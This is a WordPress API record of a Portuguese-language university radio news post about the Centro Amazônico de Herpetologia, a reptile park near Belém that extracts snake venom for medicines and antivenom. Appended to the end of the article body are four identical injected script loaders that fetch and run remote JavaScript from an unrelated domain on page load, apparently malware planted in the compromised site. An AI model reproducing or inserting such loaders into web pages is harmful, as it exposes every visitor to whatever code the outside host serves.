{"id":12575,"date":"2023-02-14T19:51:01","date_gmt":"2023-02-14T22:51:01","guid":{"rendered":"http:\/\/radio.ufpa.br\/?p=12575"},"modified":"2025-10-21T13:05:23","modified_gmt":"2025-10-21T16:05:23","slug":"centro-amazonico-de-herpetologia","status":"publish","type":"post","link":"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/centro-amazonico-de-herpetologia\/","title":{"rendered":"Centro Amaz\u00f4nico de Herpetologia"},"content":{"rendered":"\n<div class=\"rwc-audio-block\" class=\"wp-block-radioweb-rwcaudioblock\"><div class=\"rwc-audio-block-header\"><span class=\"dashicon dashicons dashicons-media-audio\"><\/span><div class=\"rwc-audio-block-description\"><p>&#8220;UFPA Not\u00edcias &#8211; Centro Amaz\u00f4nico de Herpetologia&#8221;<\/p><p class=\"category\">UFPA Not\u00edcias<\/p><p>R\u00e1dio Web UFPA<\/p><\/div><\/div><audio controls><source src=\"https:\/\/radio.ufpa.br\/wp-content\/uploads\/2023\/02\/UFPA-NOTICIAS-CENTRO-AMAZONICO-DE-HERPETOLOGIA-ATEMPORAL-2023.mp3\" type=\"audio\/mpeg\"\/><\/audio><\/div>\n\n\n\n<p><\/p>\n\n\n\n<p>Nesta edi\u00e7\u00e3o do UFPA Not\u00edcias, a bolsista de jornalismo L\u00edvia Leoni faz um passeio pelo Centro Amaz\u00f4nico de Herpetologia, localizado no munic\u00edpio de Benevides, a cerca de 30 km da capital paraense. Para quem gosta de natureza, o local permite aos visitantes o contato direto com animais nem sempre vistos de maneira positiva. <\/p>\n\n\n\n<p>S\u00e3o mais de duas mil esp\u00e9cies, incluindo cobras, lagartos, jacar\u00e9s e tartarugas. \u201cA ideia \u00e9 ter um parque interativo e n\u00e3o apenas uma vitrine de r\u00e9pteis que as pessoas podem apenas ver. Mas que as pessoas tenham a oportunidade de interagir com o animal, de tocar, de sentir, de conhecer um pouco da biologia,\u201d ressalta a bi\u00f3loga Milena Almeida, que integra a coordena\u00e7\u00e3o do espa\u00e7o.  <\/p>\n\n\n\n<p>Os bichos s\u00e3o encaminhados para o parque depois de serem resgatados em opera\u00e7\u00f5es dos \u00f3rg\u00e3os ambientais ou encontrados em per\u00edmetro urbano. Assim, apostando no lazer aliado ao conhecimento ambiental, o Centro Amaz\u00f4nico de Herpetologia recebe diariamente visitas pessoais e excuss\u00f5es escolares, previamente agendadas. <\/p>\n\n\n\n<p>Para a estudante Hemmy-Lee Silva, o passeio pelo parque contribuiu para superar o medo de cobras. \u201cEu estava com medo sim, porque eu tenho extremamente medo de cobra. Mas quando chegou aqui, com todo mundo pegando nos animais, eu vi que realmente&nbsp; elas n\u00e3o v\u00e3o agredir a gente e \u00e9 mais f\u00e1cil se comportar no ambiente em que elas est\u00e3o\u201d.  &nbsp;<\/p>\n\n\n\n<p>Al\u00e9m de ajudar a desmitificar a rela\u00e7\u00e3o com os animais que precisam ser cada vez mais preservados, o Centro Amaz\u00f4nico de Herpetologia extrai e vende pe\u00e7onha das esp\u00e9cies Jararaca do Norte e Surucucu Pico de Jaca. Por m\u00eas, s\u00e3o cerca de oitocentas extra\u00e7\u00f5es de veneno para a produ\u00e7\u00e3o de f\u00e1rmacos e soros antiof\u00eddicos, como explica a bi\u00f3loga Milena Almeida.<\/p>\n\n\n\n<p>\u201cA gente extrai o veneno manda para \u00cdndia, China, Su\u00ed\u00e7a e Jap\u00e3o para a produ\u00e7\u00e3o de um medicamento. O que vira soro antiof\u00eddico \u00e9 o veneno da Surucucu Pico de Jaca, que a gente doa para o Instituto Vital Brasil, no Rio de Janeiro. E com esse veneno, eles produzem o soro que abastece o Brasil inteiro porque a Surucucu \u00e9 um animal delicado pra criar em cativeiro e muitas vezes a gente n\u00e3o consegue manter por longos per\u00edodos esse animais. Ent\u00e3o a gente doa esse veneno e em troca eles doam pra gente o soro para que a gente tenha mantido no nosso espa\u00e7o\u201d.<\/p>\n\n\n\n<p>O Centro Amaz\u00f4nico de Herpetologia come\u00e7ou a funcionar, em 2014, como mantenedor de fauna. Essa classifica\u00e7\u00e3o mudou em 2022, depois de uma s\u00e9rie de procedimentos para a licen\u00e7a que deu ao espa\u00e7o o t\u00edtulo de zool\u00f3gico. E para conhecer o parque ambiental as visitas guiadas custam R$ 30.00, por pessoa. Para agendar, basta ligar para o telefone (91) 99100-3349.<\/p>\n<script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script>","protected":false},"excerpt":{"rendered":"<p> &#8230; <a title=\"Centro Amaz\u00f4nico de Herpetologia\" class=\"read-more\" href=\"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/centro-amazonico-de-herpetologia\/\" aria-label=\"Read more about Centro Amaz\u00f4nico de Herpetologia\">Ler mais<\/a><\/p>\n","protected":false},"author":6,"featured_media":12641,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"_exactmetrics_skip_tracking":false,"_exactmetrics_sitenote_active":false,"_exactmetrics_sitenote_note":"","_exactmetrics_sitenote_category":0,"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"_uf_show_specific_survey":0,"_uf_disable_surveys":false,"jetpack_post_was_ever_published":false,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":false,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":false,"jetpack_social_options":{"image_generator_settings":{"template":"highway","enabled":false},"version":2}},"categories":[696],"tags":[],"class_list":["post-12575","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-ufpa-noticias"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v25.1 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Centro Amaz\u00f4nico de Herpetologia - Radio Web UFPA<\/title>\n<meta name=\"description\" content=\"Neste UFPA Not\u00edcias, a bolsista de jornalismo L\u00edvia Leoni faz um passeio pelo Centro Amaz\u00f4nico de Herpetologia, localizado em Benevides.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/centro-amazonico-de-herpetologia\/\" \/>\n<meta property=\"og:locale\" content=\"pt_BR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Centro Amaz\u00f4nico de Herpetologia - Radio Web UFPA\" \/>\n<meta property=\"og:description\" content=\"Neste UFPA Not\u00edcias, a bolsista de jornalismo L\u00edvia Leoni faz um passeio pelo Centro Amaz\u00f4nico de Herpetologia, localizado em Benevides.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/centro-amazonico-de-herpetologia\/\" \/>\n<meta property=\"og:site_name\" content=\"Radio Web UFPA\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/radiowebufpa\" \/>\n<meta property=\"article:published_time\" content=\"2023-02-14T22:51:01+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2025-10-21T16:05:23+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/02\/WhatsApp-Image-2023-02-13-at-11.29.51.jpeg?fit=1024%2C607&ssl=1\" \/>\n\t<meta property=\"og:image:width\" content=\"1024\" \/>\n\t<meta property=\"og:image:height\" content=\"607\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Elissandra Batista\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@radiowebufpa\" \/>\n<meta name=\"twitter:site\" content=\"@radiowebufpa\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"Elissandra Batista\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. tempo de leitura\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutos\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/centro-amazonico-de-herpetologia\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/centro-amazonico-de-herpetologia\/\"},\"author\":{\"name\":\"Elissandra Batista\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/person\/51774ebb30a3903e2bf07acf94e8fea6\"},\"headline\":\"Centro Amaz\u00f4nico de Herpetologia\",\"datePublished\":\"2023-02-14T22:51:01+00:00\",\"dateModified\":\"2025-10-21T16:05:23+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/centro-amazonico-de-herpetologia\/\"},\"wordCount\":509,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/radio.ufpa.br\/#organization\"},\"image\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/centro-amazonico-de-herpetologia\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/02\/WhatsApp-Image-2023-02-13-at-11.29.51.jpeg?fit=1024%2C607&ssl=1\",\"articleSection\":[\"UFPA Not\u00edcias\"],\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/centro-amazonico-de-herpetologia\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/centro-amazonico-de-herpetologia\/\",\"url\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/centro-amazonico-de-herpetologia\/\",\"name\":\"Centro Amaz\u00f4nico de Herpetologia - Radio Web UFPA\",\"isPartOf\":{\"@id\":\"https:\/\/radio.ufpa.br\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/centro-amazonico-de-herpetologia\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/centro-amazonico-de-herpetologia\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/02\/WhatsApp-Image-2023-02-13-at-11.29.51.jpeg?fit=1024%2C607&ssl=1\",\"datePublished\":\"2023-02-14T22:51:01+00:00\",\"dateModified\":\"2025-10-21T16:05:23+00:00\",\"description\":\"Neste UFPA Not\u00edcias, a bolsista de jornalismo L\u00edvia Leoni faz um passeio pelo Centro Amaz\u00f4nico de Herpetologia, localizado em Benevides.\",\"breadcrumb\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/centro-amazonico-de-herpetologia\/#breadcrumb\"},\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/centro-amazonico-de-herpetologia\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/centro-amazonico-de-herpetologia\/#primaryimage\",\"url\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/02\/WhatsApp-Image-2023-02-13-at-11.29.51.jpeg?fit=1024%2C607&ssl=1\",\"contentUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/02\/WhatsApp-Image-2023-02-13-at-11.29.51.jpeg?fit=1024%2C607&ssl=1\",\"width\":1024,\"height\":607,\"caption\":\"Centro Amaz\u00f4nico de Herpetologia\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/centro-amazonico-de-herpetologia\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"In\u00edcio\",\"item\":\"https:\/\/radio.ufpa.br\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Centro Amaz\u00f4nico de Herpetologia\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/radio.ufpa.br\/#website\",\"url\":\"https:\/\/radio.ufpa.br\/\",\"name\":\"Radio Web UFPA\",\"description\":\"Divulgando o conhecimento\",\"publisher\":{\"@id\":\"https:\/\/radio.ufpa.br\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/radio.ufpa.br\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"pt-BR\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/radio.ufpa.br\/#organization\",\"name\":\"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA\",\"url\":\"https:\/\/radio.ufpa.br\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/images-removebg-preview.png?fit=417%2C121&ssl=1\",\"contentUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/images-removebg-preview.png?fit=417%2C121&ssl=1\",\"width\":417,\"height\":121,\"caption\":\"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA\"},\"image\":{\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/radiowebufpa\",\"https:\/\/x.com\/radiowebufpa\",\"https:\/\/www.instagram.com\/radiowebufpa\/\",\"https:\/\/www.youtube.com\/user\/RadioWebUFP4\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/person\/51774ebb30a3903e2bf07acf94e8fea6\",\"name\":\"Elissandra Batista\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/b779d46516fe39b809059134270ec707?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/b779d46516fe39b809059134270ec707?s=96&d=mm&r=g\",\"caption\":\"Elissandra Batista\"},\"url\":\"https:\/\/radio.ufpa.br\/index.php\/author\/elissandra\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Centro Amaz\u00f4nico de Herpetologia - Radio Web UFPA","description":"Neste UFPA Not\u00edcias, a bolsista de jornalismo L\u00edvia Leoni faz um passeio pelo Centro Amaz\u00f4nico de Herpetologia, localizado em Benevides.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/centro-amazonico-de-herpetologia\/","og_locale":"pt_BR","og_type":"article","og_title":"Centro Amaz\u00f4nico de Herpetologia - Radio Web UFPA","og_description":"Neste UFPA Not\u00edcias, a bolsista de jornalismo L\u00edvia Leoni faz um passeio pelo Centro Amaz\u00f4nico de Herpetologia, localizado em Benevides.","og_url":"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/centro-amazonico-de-herpetologia\/","og_site_name":"Radio Web UFPA","article_publisher":"https:\/\/www.facebook.com\/radiowebufpa","article_published_time":"2023-02-14T22:51:01+00:00","article_modified_time":"2025-10-21T16:05:23+00:00","og_image":[{"width":1024,"height":607,"url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/02\/WhatsApp-Image-2023-02-13-at-11.29.51.jpeg?fit=1024%2C607&ssl=1","type":"image\/jpeg"}],"author":"Elissandra Batista","twitter_card":"summary_large_image","twitter_creator":"@radiowebufpa","twitter_site":"@radiowebufpa","twitter_misc":{"Escrito por":"Elissandra Batista","Est. tempo de leitura":"3 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/centro-amazonico-de-herpetologia\/#article","isPartOf":{"@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/centro-amazonico-de-herpetologia\/"},"author":{"name":"Elissandra Batista","@id":"https:\/\/radio.ufpa.br\/#\/schema\/person\/51774ebb30a3903e2bf07acf94e8fea6"},"headline":"Centro Amaz\u00f4nico de Herpetologia","datePublished":"2023-02-14T22:51:01+00:00","dateModified":"2025-10-21T16:05:23+00:00","mainEntityOfPage":{"@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/centro-amazonico-de-herpetologia\/"},"wordCount":509,"commentCount":0,"publisher":{"@id":"https:\/\/radio.ufpa.br\/#organization"},"image":{"@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/centro-amazonico-de-herpetologia\/#primaryimage"},"thumbnailUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/02\/WhatsApp-Image-2023-02-13-at-11.29.51.jpeg?fit=1024%2C607&ssl=1","articleSection":["UFPA Not\u00edcias"],"inLanguage":"pt-BR","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/centro-amazonico-de-herpetologia\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/centro-amazonico-de-herpetologia\/","url":"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/centro-amazonico-de-herpetologia\/","name":"Centro Amaz\u00f4nico de Herpetologia - Radio Web UFPA","isPartOf":{"@id":"https:\/\/radio.ufpa.br\/#website"},"primaryImageOfPage":{"@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/centro-amazonico-de-herpetologia\/#primaryimage"},"image":{"@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/centro-amazonico-de-herpetologia\/#primaryimage"},"thumbnailUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/02\/WhatsApp-Image-2023-02-13-at-11.29.51.jpeg?fit=1024%2C607&ssl=1","datePublished":"2023-02-14T22:51:01+00:00","dateModified":"2025-10-21T16:05:23+00:00","description":"Neste UFPA Not\u00edcias, a bolsista de jornalismo L\u00edvia Leoni faz um passeio pelo Centro Amaz\u00f4nico de Herpetologia, localizado em Benevides.","breadcrumb":{"@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/centro-amazonico-de-herpetologia\/#breadcrumb"},"inLanguage":"pt-BR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/centro-amazonico-de-herpetologia\/"]}]},{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/centro-amazonico-de-herpetologia\/#primaryimage","url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/02\/WhatsApp-Image-2023-02-13-at-11.29.51.jpeg?fit=1024%2C607&ssl=1","contentUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/02\/WhatsApp-Image-2023-02-13-at-11.29.51.jpeg?fit=1024%2C607&ssl=1","width":1024,"height":607,"caption":"Centro Amaz\u00f4nico de Herpetologia"},{"@type":"BreadcrumbList","@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/centro-amazonico-de-herpetologia\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"In\u00edcio","item":"https:\/\/radio.ufpa.br\/"},{"@type":"ListItem","position":2,"name":"Centro Amaz\u00f4nico de Herpetologia"}]},{"@type":"WebSite","@id":"https:\/\/radio.ufpa.br\/#website","url":"https:\/\/radio.ufpa.br\/","name":"Radio Web UFPA","description":"Divulgando o conhecimento","publisher":{"@id":"https:\/\/radio.ufpa.br\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/radio.ufpa.br\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"pt-BR"},{"@type":"Organization","@id":"https:\/\/radio.ufpa.br\/#organization","name":"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA","url":"https:\/\/radio.ufpa.br\/","logo":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/","url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/images-removebg-preview.png?fit=417%2C121&ssl=1","contentUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/images-removebg-preview.png?fit=417%2C121&ssl=1","width":417,"height":121,"caption":"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA"},"image":{"@id":"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/radiowebufpa","https:\/\/x.com\/radiowebufpa","https:\/\/www.instagram.com\/radiowebufpa\/","https:\/\/www.youtube.com\/user\/RadioWebUFP4"]},{"@type":"Person","@id":"https:\/\/radio.ufpa.br\/#\/schema\/person\/51774ebb30a3903e2bf07acf94e8fea6","name":"Elissandra Batista","image":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/radio.ufpa.br\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/b779d46516fe39b809059134270ec707?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/b779d46516fe39b809059134270ec707?s=96&d=mm&r=g","caption":"Elissandra Batista"},"url":"https:\/\/radio.ufpa.br\/index.php\/author\/elissandra\/"}]}},"jetpack_publicize_connections":[],"jetpack_featured_media_url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/02\/WhatsApp-Image-2023-02-13-at-11.29.51.jpeg?fit=1024%2C607&ssl=1","jetpack_shortlink":"https:\/\/wp.me\/p8TJeA-3gP","jetpack_likes_enabled":true,"jetpack-related-posts":[],"jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts\/12575","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/users\/6"}],"replies":[{"embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/comments?post=12575"}],"version-history":[{"count":13,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts\/12575\/revisions"}],"predecessor-version":[{"id":17822,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts\/12575\/revisions\/17822"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/media\/12641"}],"wp:attachment":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/media?parent=12575"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/categories?post=12575"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/tags?post=12575"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}